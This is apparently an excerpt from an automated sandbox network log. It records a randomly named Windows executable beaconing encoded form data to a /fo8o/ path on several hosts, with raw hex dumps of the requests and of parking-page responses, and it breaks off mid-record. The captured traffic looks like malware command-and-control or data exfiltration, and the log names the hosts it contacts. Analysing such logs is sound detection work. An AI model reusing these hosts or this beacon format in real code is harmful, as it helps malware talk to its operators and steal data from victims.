                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 75 33 54 6d 77 4d 61 75 45 6d 38 62 43 70 5a 30 37 78 4b 47 4b 50 33 48 63 32 76 79 34 44 69 45 2b 48 36 48 72 46 69 4b 68 63 65 63 72 2b 61 55 59 77 4c 51 2b 36 33 73 63 54 68 32 45 66 54 73 59 6e 4a 78 53 73 4c 30 69 71 70 58 30 78 33 4b 4d 30 58 4f 43 65 38 58 52 63 44 54 56 67 68 69 78 65 41 37 76 38 67 59 46 69 2f 38 6b 65 73 73 4b 79 65 65 31 45 4f 76 4e 38 51 4a 4e 66 55 44 47 4d 67 2b 65 39 79 31 73 68 51 39 75 73 4b 54 73 73 4a 67 76 2f 6d 64 62 70 2f 6f 43 74 33 [TRUNCATED]
                                                                                  Data Ascii: pnGX8L3p=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhu3TmwMauEm8bCpZ07xKGKP3Hc2vy4DiE+H6HrFiKhcecr+aUYwLQ+63scTh2EfTsYnJxSsL0iqpX0x3KM0XOCe8XRcDTVghixeA7v8gYFi/8kessKyee1EOvN8QJNfUDGMg+e9y1shQ9usKTssJgv/mdbp/oCt3lId22W4Y81k5HtKy5x22frMsbOotkvbhi646rremCShbroDUjUgsu6c7CjYLkKtFzmpXRGl3Ld7CbiBmuRiduyNdov15vLDVfDEui7tum9E7v4e63VvBdeC6joDS6shuFcb4J0muXndGqjsZzyJG0j/SslrqRihzqqCgho0HnUlciGFL3NXW+tWURlL1cCc4BMrepvUxTDjwpBzNzFaksp+A5VwcSc4WFI+aihmIJlg7EJs13kpMWCJX/+WbKYHKY3+T3bfyzWCTNQ6wAp6JjvaTYaz8GYfdHyQLYRPt4nFYWS02B9Y4/UuwPjSa2+S/+ZUJD0mFwOFpd/UaVEJy20CWWfgfqDZG8R2dMvnd7PuTUZ3ZEAWwkcs/3cUC8BnIK285v2IuvaiBXs2Nm0BQDOzoF2Wr+zhje86nlyoq6dmx782qZxlxWS6cEPhIofgX/UmovvfAfGxbswiBlIgjbQv43FPeWUYFq2OSc32m0PpdkKGDck+WQeFIbtTpAirxB84paDGX+UuBvs9oRlfN9YpWWrobTkUJVhTJMasV72SHqy2faJPw51w05Pabcfu+eGDafkuFamYllEy8B+eLT7rDEvS7Bt+lKe5myvGzvhNHaHBkghkeegmadgtcGD+ga1ZMod+TpSmNwN8uWspb1vuWNNnalfk2Rc [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.64991085.159.66.93803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:29:30.265819073 CET532OUTGET /fo8o/?pnGX8L3p=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.magmadokum.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Jan 15, 2025 08:30:30.970251083 CET194INHTTP/1.0 504 Gateway Time-out
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.64991391.195.240.94803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:30:36.024121046 CET790OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rssnewscast.com
                                                                                  Origin: http://www.rssnewscast.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 213
                                                                                  Referer: http://www.rssnewscast.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 38 39 4a 64 39 49 54 71 44 51 47 32 64 48 32 67 68 72 61 55 52 44 67 6b 56 55 4f 52 48 32 77 49 51 70 6c 30 4f 4b 65 34 35 36 50
                                                                                  Data Ascii: pnGX8L3p=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8p89Jd9ITqDQG2dH2ghraURDgkVUORH2wIQpl0OKe456P
                                                                                  Jan 15, 2025 08:30:36.677772045 CET707INHTTP/1.1 405 Not Allowed
                                                                                  date: Wed, 15 Jan 2025 07:30:36 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: Parking/1.0
                                                                                  connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.64991491.195.240.94803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:30:38.716013908 CET814OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rssnewscast.com
                                                                                  Origin: http://www.rssnewscast.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 237
                                                                                  Referer: http://www.rssnewscast.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6a 69 6b 58 4d 38 52 6e 32 61 4b 51 52 6c 6d 5a 47 35 33 4e 66 73 33 6c 50 63 61 46 6e 63 73 47 78 34 4f 35 64 41 2f 36 77 76 55 67 3d 3d
                                                                                  Data Ascii: pnGX8L3p=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBjikXM8Rn2aKQRlmZG53Nfs3lPcaFncsGx4O5dA/6wvUg==
                                                                                  Jan 15, 2025 08:30:39.366835117 CET707INHTTP/1.1 405 Not Allowed
                                                                                  date: Wed, 15 Jan 2025 07:30:39 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: Parking/1.0
                                                                                  connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.64991591.195.240.94803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:30:41.252074003 CET1827OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rssnewscast.com
                                                                                  Origin: http://www.rssnewscast.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1249
                                                                                  Referer: http://www.rssnewscast.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 45 42 31 63 4c 75 6d 77 6a 67 5a 67 33 54 38 58 6f 6d 56 6a 6d 6f 4b 79 67 56 33 62 54 52 31 66 6d 45 79 6a 50 6e 59 6b 47 6d 6b 41 4e 56 45 4f 68 4f 31 37 46 72 4f 37 79 4c 69 6c 5a 7a 4c 42 67 59 42 57 70 6b 47 69 6b 79 6e 4c 70 48 68 2f 79 2b 61 4a 62 59 31 5a 48 78 31 41 61 67 46 6b 4d 43 2f 78 36 39 56 2b 67 36 67 49 4a 52 42 2b 63 46 6e 7a 4f 31 73 77 61 33 61 77 57 72 65 58 66 5a 65 34 66 34 4f 67 4b 44 72 48 4f 74 64 6a 79 68 53 66 4d 69 69 72 70 62 46 6a 45 55 48 [TRUNCATED]
                                                                                  Data Ascii: pnGX8L3p=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iEB1cLumwjgZg3T8XomVjmoKygV3bTR1fmEyjPnYkGmkANVEOhO17FrO7yLilZzLBgYBWpkGikynLpHh/y+aJbY1ZHx1AagFkMC/x69V+g6gIJRB+cFnzO1swa3awWreXfZe4f4OgKDrHOtdjyhSfMiirpbFjEUHbMdG8QfHTNHSA7tyZbJWfktDUtH9Vl4Gtq8+Ux/87b5vyBZlZYyttEcaYKi5Hr/Xwb9YLa2Yei/i9KdGN+ekuKAs4DWiqxPCl4h2D2WoPC2Im4LogCU9lEEunC3sdeZQsmzQEnRbiKzvlwJNNZMxkvX/iVUERy7NOcDrGglvWoA//QUJEUrWPAY6bAMuMHldSMDP73WLT/pcef5/eW/phVo3fiAIBIROfcD9pck17f9HLmGF+97KsTXAUSztBb1dglkU5bNDcIl7v4KEW2ezPEtIRzZ1Zvr+Qw/CldBPqYVaiGAbSfwKEdVQBeyWPBT2HgRPcq+pzSZ6hUDvFvX2jyem3v45KFKbEmo+k7N7coOpbPeS9IU5yGQ9dOJkE+sjueUwnXVoxD4ADrgEf9O1w8kIe3k+csb6hu3H8aMIM9szpOhAPv5oN429yEancjxPR4b8FsR4zMEeZD1AjVw2ohXwyv92mSegKgAIr+Ing6DiEGhIs5gNTJZ5y8rfSHKYhPSbwts/AuiHka1aGruK0xGZNDf6subQ987NoQUggtQ0J0nbdgVp6LMofjRX6dZdO6n4Xziut9vo8m2lR3l8kBtheU1WEFXC1J60k/sILCq5v1cil9pn/9isZXUq61rkHNyID53h+JoEv2dtekja9jUQzXrR8gnSLE [TRUNCATED]
                                                                                  Jan 15, 2025 08:30:41.895771980 CET707INHTTP/1.1 405 Not Allowed
                                                                                  date: Wed, 15 Jan 2025 07:30:41 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: Parking/1.0
                                                                                  connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.64991691.195.240.94803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:30:43.781824112 CET533OUTGET /fo8o/?pnGX8L3p=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.rssnewscast.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Jan 15, 2025 08:30:44.635128021 CET1236INHTTP/1.1 200 OK
                                                                                  date: Wed, 15 Jan 2025 07:30:44 GMT
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  transfer-encoding: chunked
                                                                                  vary: Accept-Encoding
                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  pragma: no-cache
                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_CFc1goqyp60YdxQp4WFnub2D1AJ1I4Nj++L4Q80kxQClfjjOZcfsyonhLjtTD3jOPmsfMN994Wa4WKq7Pbek5g==
                                                                                  last-modified: Wed, 15 Jan 2025 07:30:44 GMT
                                                                                  x-cache-miss-from: parking-867c7c867-jt2dd
                                                                                  server: Parking/1.0
                                                                                  connection: close
                                                                                  Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 43 46 63 31 67 6f 71 79 70 36 30 59 64 78 51 70 34 57 46 6e 75 62 32 44 31 41 4a 31 49 34 4e 6a 2b 2b 4c 34 51 38 30 6b 78 51 43 6c 66 6a 6a 4f 5a 63 66 73 79 6f 6e 68 4c 6a 74 54 44 33 6a 4f 50 6d 73 66 4d 4e 39 39 34 57 61 34 57 4b 71 37 50 62 65 6b 35 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                                                  Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_CFc1goqyp60YdxQp4WFnub2D1AJ1I4Nj++L4Q80kxQClfjjOZcfsyonhLjtTD3jOPmsfMN994Wa4WKq7Pbek5g==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
                                                                                  Jan 15, 2025 08:30:44.635144949 CET1236INData Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69
                                                                                  Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchiAECng for!"><link rel="icon" type="image/png" href="//img.s
                                                                                  Jan 15, 2025 08:30:44.635154963 CET1236INData Raw: 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d 30
                                                                                  Data Ascii: e-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sele
                                                                                  Jan 15, 2025 08:30:44.635164976 CET672INData Raw: 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e 7b
                                                                                  Data Ascii: ]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:no
                                                                                  Jan 15, 2025 08:30:44.635175943 CET1236INData Raw: 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 61 64 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d
